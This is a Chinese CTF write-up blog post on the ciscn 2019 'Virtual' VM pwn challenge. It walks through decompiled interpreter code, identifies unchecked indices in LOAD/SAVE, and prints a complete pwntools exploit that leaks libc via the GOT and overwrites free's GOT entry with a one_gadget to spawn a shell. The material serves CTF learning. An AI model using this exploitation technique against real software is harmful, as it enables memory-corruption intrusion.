<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
    
    <link href="https://fonts.loli.net/css?family=Comic Neue:300,300italic,400,400italic,700,700italic|Comic Neue:300,300italic,400,400italic,700,700italic|Comic Neue:300,300italic,400,400italic,700,700italic|Comic Neue:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/x32.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/x16.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="ditto's blog" type="application/atom+xml">






<meta name="description" content="前言第一次遇到虚拟机类的pwn题是国赛线上初赛，当时没有学过解释器，不懂虚拟机的实现。复现下国赛和字节跳动ctf的两道vm pwn题.关于写虚拟机，这篇文章挺不错的:手把手教你构建 C 语言编译器（2）- 虚拟机这篇也是我刚学解释器时看的文章.. ciscn 2019 Virtual分析程序开始处分配了三块空间用来当作stack段，text段，data段.12345do_init();exec_n">
<meta property="og:type" content="article">
<meta property="og:title" content="VM pwn 初探">
<meta property="og:url" content="http://yoursite.com/2019/09/28/VM-pwn-初探/index.html">
<meta property="og:site_name" content="ditto&#39;s blog">
<meta property="og:description" content="前言第一次遇到虚拟机类的pwn题是国赛线上初赛，当时没有学过解释器，不懂虚拟机的实现。复现下国赛和字节跳动ctf的两道vm pwn题.关于写虚拟机，这篇文章挺不错的:手把手教你构建 C 语言编译器（2）- 虚拟机这篇也是我刚学解释器时看的文章.. ciscn 2019 Virtual分析程序开始处分配了三块空间用来当作stack段，text段，data段.12345do_init();exec_n">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/09/28/VM-pwn-初探/1.png">
<meta property="og:image" content="http://yoursite.com/2019/09/28/VM-pwn-初探/2.png">
<meta property="og:updated_time" content="2019-09-29T03:37:39.250Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="VM pwn 初探">
<meta name="twitter:description" content="前言第一次遇到虚拟机类的pwn题是国赛线上初赛，当时没有学过解释器，不懂虚拟机的实现。复现下国赛和字节跳动ctf的两道vm pwn题.关于写虚拟机，这篇文章挺不错的:手把手教你构建 C 语言编译器（2）- 虚拟机这篇也是我刚学解释器时看的文章.. ciscn 2019 Virtual分析程序开始处分配了三块空间用来当作stack段，text段，data段.12345do_init();exec_n">
<meta name="twitter:image" content="http://yoursite.com/2019/09/28/VM-pwn-初探/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/09/28/VM-pwn-初探/">





  <title>VM pwn 初探 | ditto's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">ditto's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            站点地图
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/28/VM-pwn-初探/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ditto">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/my.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ditto's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">VM pwn 初探</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-28T12:18:22+08:00">
                2019-09-28
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.4k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  12
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>第一次遇到虚拟机类的pwn题是国赛线上初赛，当时没有学过解释器，不懂虚拟机的实现。复现下国赛和字节跳动ctf的两道vm pwn题.<br>关于写虚拟机，这篇文章挺不错的:<br><a href="https://lotabout.me/2015/write-a-C-interpreter-2/" target="_blank" rel="noopener">手把手教你构建 C 语言编译器（2）- 虚拟机</a><br>这篇也是我刚学解释器时看的文章..</p>
<h3 id="ciscn-2019-Virtual"><a href="#ciscn-2019-Virtual" class="headerlink" title="ciscn 2019 Virtual"></a>ciscn 2019 Virtual</h3><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>程序开始处分配了三块空间用来当作stack段，text段，data段.<br><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">do_init();</span><br><span class="line">exec_name = (char *)malloc(0x20uLL);</span><br><span class="line">stack_addr = sub_4013B4(64);</span><br><span class="line">text_addr = sub_4013B4(128);</span><br><span class="line">data_addr = (void **)sub_4013B4(64);</span><br></pre></td></tr></table></figure></p>
<p>这个函数先申请一个小的chunk用来存放段的信息，包括段的地址，当前存放的数据的个数，段的大小等<br><figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">section_info *__fastcall sub_4013B4(<span class="built_in">int</span> size)</span><br><span class="line">&#123;</span><br><span class="line">  section_info *<span class="literal">result</span>; // rax</span><br><span class="line">  section_info *<span class="keyword">ptr</span>; // [rsp+<span class="number">10</span>h] [rbp-<span class="number">10</span>h]</span><br><span class="line">  <span class="built_in">void</span> *s; // [rsp+<span class="number">18</span>h] [rbp-<span class="number">8</span>h]</span><br><span class="line"></span><br><span class="line">  <span class="keyword">ptr</span> = (section_info *)malloc(<span class="number">0x10</span>uLL);</span><br><span class="line">  <span class="keyword">if</span> ( !<span class="keyword">ptr</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>LL;</span><br><span class="line">  s = malloc(<span class="number">8</span>LL * size);</span><br><span class="line">  <span class="keyword">if</span> ( s )</span><br><span class="line">  &#123;</span><br><span class="line">    memset(s, <span class="number">0</span>, <span class="number">8</span>LL * size);</span><br><span class="line">    <span class="keyword">ptr</span>-&gt;section_ptr = (__int64)s;</span><br><span class="line">    <span class="keyword">ptr</span>-&gt;size = size;</span><br><span class="line">    <span class="keyword">ptr</span>-&gt;idx = -<span class="number">1</span>;</span><br><span class="line">    <span class="literal">result</span> = <span class="keyword">ptr</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    free(<span class="keyword">ptr</span>);</span><br><span class="line">    <span class="literal">result</span> = <span class="number">0</span>LL;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="literal">result</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>结构体如下:<br><figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">00000000 </span>section_info    struc ; (sizeof=<span class="number">0</span>x10, mappedto_6)</span><br><span class="line"><span class="symbol">00000000 </span>section_ptr     dq ?</span><br><span class="line"><span class="symbol">00000008 </span>size            dd ?</span><br><span class="line"><span class="number">0000000</span>C idx             dd ?</span><br><span class="line"><span class="symbol">00000010 </span>section_info    ends</span><br></pre></td></tr></table></figure></p>
<p>然后输入指令和栈数据:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">"Your instruction:"</span>);</span><br><span class="line">my_read_((__int64)ptr, <span class="number">0x400</span>u);</span><br><span class="line">StoreOpcode(text_addr, ptr);</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"Your stack data:"</span>);</span><br><span class="line">my_read_((__int64)ptr, <span class="number">0x400</span>u);</span><br><span class="line">StroeStack(stack_addr, ptr);</span><br></pre></td></tr></table></figure></p>
<p>这里输入的指令都是单独的指令..指令后面不跟着数据<br>StoreOpcode函数:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">StoreOpcode</span><span class="params">(section_info *text, <span class="keyword">char</span> *src)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> idx; <span class="comment">// [rsp+18h] [rbp-18h]</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+1Ch] [rbp-14h]</span></span><br><span class="line">  <span class="keyword">const</span> <span class="keyword">char</span> *s1; <span class="comment">// [rsp+20h] [rbp-10h]</span></span><br><span class="line">  _QWORD *ptr; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line">  <span class="keyword">if</span> ( text )</span><br><span class="line">  &#123;</span><br><span class="line">    ptr = <span class="built_in">malloc</span>(<span class="number">8L</span>L * text-&gt;size);</span><br><span class="line">    idx = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> ( s1 = strtok(src, delim); idx &lt; text-&gt;size &amp;&amp; s1; s1 = strtok(<span class="number">0L</span>L, delim) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"push"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = PUSH;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"pop"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = POP;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"add"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = ADD;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"sub"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = SUB;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"mul"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = MUL;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"div"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = DIV;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"load"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = LOAD;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(s1, <span class="string">"save"</span>) )</span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = SAVE;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">      &#123;</span><br><span class="line">        ptr[idx] = <span class="number">255L</span>L;</span><br><span class="line">      &#125;</span><br><span class="line">      ++idx;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> ( i = idx - <span class="number">1</span>; i &gt;= <span class="number">0</span> &amp;&amp; (<span class="keyword">unsigned</span> <span class="keyword">int</span>)StoreInSection(text, ptr[i]); --i )<span class="comment">// 最先输入的指令保存在最后面</span></span><br><span class="line">      ;</span><br><span class="line">    <span class="built_in">free</span>(ptr);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">signed __int64 __fastcall StoreInSection(section_info *<span class="built_in">a1</span>, __int64 data)</span><br><span class="line">&#123;</span><br><span class="line">  int idx<span class="comment">; // [rsp+1Ch] [rbp-4h]</span></span><br><span class="line">  if ( !<span class="built_in">a1</span> )</span><br><span class="line">    return <span class="number">0</span>LL<span class="comment">;</span></span><br><span class="line">  idx = <span class="built_in">a1</span>-&gt;idx + <span class="number">1</span><span class="comment">;</span></span><br><span class="line">  if ( idx == <span class="built_in">a1</span>-&gt;size )</span><br><span class="line">    return <span class="number">0</span>LL<span class="comment">;</span></span><br><span class="line">  *(_QWORD *)(<span class="built_in">a1</span>-&gt;section_ptr + <span class="number">8</span>LL * idx) = data<span class="comment">;</span></span><br><span class="line">  <span class="built_in">a1</span>-&gt;idx = idx<span class="comment">;</span></span><br><span class="line">  return <span class="number">1</span>LL<span class="comment">;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>使用strtok对输入的指令以” \n\r\t”进行分割，可以看到合法的字节码有push,pop,add,sub,mul,div,load,save,。<br>程序先将这些字节码存储在ptr这个数组里，然后再复制到程序段中。<br>注意先输入的指令是存放在程序段的高地址处，呈队列形式，先进先出. 等到取指令的时候是从队列的头部开始取.</p>
<p>输入栈数据也是类似的,数据先进先出:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">StroeStack</span><span class="params">(section_info *stack_addr, <span class="keyword">char</span> *a2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> idx; <span class="comment">// [rsp+18h] [rbp-28h]</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line">  <span class="keyword">const</span> <span class="keyword">char</span> *nptr; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line">  _QWORD *ptr; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line">  <span class="keyword">if</span> ( stack_addr )</span><br><span class="line">  &#123;</span><br><span class="line">    ptr = <span class="built_in">malloc</span>(<span class="number">8L</span>L * stack_addr-&gt;size);</span><br><span class="line">    idx = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> ( nptr = strtok(a2, delim); idx &lt; stack_addr-&gt;size &amp;&amp; nptr; nptr = strtok(<span class="number">0L</span>L, delim) )</span><br><span class="line">      ptr[idx++] = atol(nptr);</span><br><span class="line">    <span class="keyword">for</span> ( i = idx - <span class="number">1</span>; i &gt;= <span class="number">0</span> &amp;&amp; (<span class="keyword">unsigned</span> <span class="keyword">int</span>)StoreInSection(stack_addr, ptr[i]); --i )</span><br><span class="line">      ;</span><br><span class="line">    <span class="built_in">free</span>(ptr);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>run函数里来对字节码进行解释执行,经过分析可以得到以下函数:<br><img src="/2019/09/28/VM-pwn-初探/1.png" alt=""></p>
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h4><p>漏洞出在do_SAVE,do_LOAD函数中:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">signed</span> __int64 __<span class="function">fastcall <span class="title">do_LOAD</span><span class="params">(section_info *data_addr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line">  __int64 idx; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)Get(data_addr, &amp;idx) )</span><br><span class="line">    result = StoreInSection(data_addr, *(_QWORD *)(data_addr-&gt;section_ptr + <span class="number">8</span> * (data_addr-&gt;idx + idx)));</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    result = <span class="number">0L</span>L;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">signed</span> __int64 __<span class="function">fastcall <span class="title">do_SAVE</span><span class="params">(section_info *data_addr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v2; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line">  __int64 value; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)Get(data_addr, &amp;v2) || !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)Get(data_addr, &amp;value) )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">  *(_QWORD *)(<span class="number">8</span> * (data_addr-&gt;idx + v2) + data_addr-&gt;section_ptr) = value;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">1L</span>L;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>没有对index进行检查，可以造成越界读写.</p>
<p>来观察下堆的布局:<br><img src="/2019/09/28/VM-pwn-初探/2.png" alt=""><br>可以利用SAVE，输入一个负数index，修改data_info的section指针,将他指向本身程序的data段，这样以后的读取操作就在本身程序数据段上进行了.<br>然后利用相对偏移LOAD读取got表，得到libc地址，再利用add，将地址加到one_gadget，再利用SAVE修改got表即可getshell</p>
<h4 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp:"></a>完整exp:</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">exec_file=<span class="string">"./pwn"</span></span><br><span class="line">context.binary=exec_file</span><br><span class="line">context.terminal=[<span class="string">"tmux"</span>,<span class="string">"splitw"</span>,<span class="string">"-h"</span>]</span><br><span class="line">elf=ELF(exec_file)</span><br><span class="line"><span class="keyword">if</span> local :</span><br><span class="line">    a=process(exec_file)</span><br><span class="line">    <span class="keyword">if</span> context.arch == <span class="string">"i386"</span> :</span><br><span class="line">        libc=ELF(<span class="string">"/lib/i386-linux-gnu/libc.so.6"</span>)</span><br><span class="line">    <span class="keyword">elif</span> context.arch == <span class="string">"amd64"</span> :</span><br><span class="line">        libc=ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>) </span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    a=remote(<span class="string">""</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_base</span><span class="params">(a)</span>:</span></span><br><span class="line">    text_base = a.libs()[a._cwd+a.argv[<span class="number">0</span>].strip(<span class="string">'.'</span>)]</span><br><span class="line">    <span class="keyword">for</span> key <span class="keyword">in</span> a.libs():</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"libc.so.6"</span> <span class="keyword">in</span> key:</span><br><span class="line">            <span class="keyword">return</span> text_base,a.libs()[key]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">debug</span><span class="params">()</span>:</span></span><br><span class="line">    text_base,libc_base=get_base(a)</span><br><span class="line">    script=<span class="string">"set $text_base="</span>+str(text_base)+<span class="string">'\n'</span>+<span class="string">"set $libc_base="</span>+str(libc_base)+<span class="string">'\n'</span></span><br><span class="line">    script+=<span class="string">'''</span></span><br><span class="line"><span class="string">    set $data = 0x4056a0</span></span><br><span class="line"><span class="string">    set $stack = 0x405040</span></span><br><span class="line"><span class="string">    set $text = 0x405270 </span></span><br><span class="line"><span class="string">    b *0x000000000401318</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    gdb.attach(a,script)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fuck</span><span class="params">(address)</span>:</span></span><br><span class="line">   n = globals()</span><br><span class="line">    <span class="keyword">for</span> key,value <span class="keyword">in</span> n.items():</span><br><span class="line">        <span class="keyword">if</span> value == address:</span><br><span class="line">            <span class="keyword">return</span> success(key+<span class="string">"  ==&gt;  "</span>+hex(address))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">init</span><span class="params">()</span>:</span></span><br><span class="line">    a.sendlineafter(<span class="string">"Your program name:\n"</span>,<span class="string">"aaa"</span>)</span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line">init()</span><br><span class="line">payload = <span class="string">"push push save push load push add push save"</span></span><br><span class="line">a.sendlineafter(<span class="string">"Your instruction:\n"</span>,payload)</span><br><span class="line"></span><br><span class="line">one = -(<span class="number">0x844f0</span><span class="number">-0xf1147</span>)</span><br><span class="line">data_addr=<span class="number">0x000000000404088</span></span><br><span class="line">data = [data_addr,<span class="number">-3</span>,<span class="number">-13</span> ,one ,<span class="number">-13</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># data , -3 修改 data_addr</span></span><br><span class="line"><span class="comment"># -13 读取 free的地址</span></span><br><span class="line"><span class="comment"># add one ，得到 onegadget地址</span></span><br><span class="line"><span class="comment"># save 在free_got写入one_gadget</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> data:</span><br><span class="line">    payload+=str(i)+<span class="string">" "</span></span><br><span class="line">endlineafter(<span class="string">"Your stack data:\n"</span>,payload)</span><br><span class="line">a.interactive()</span><br></pre></td></tr></table></figure>
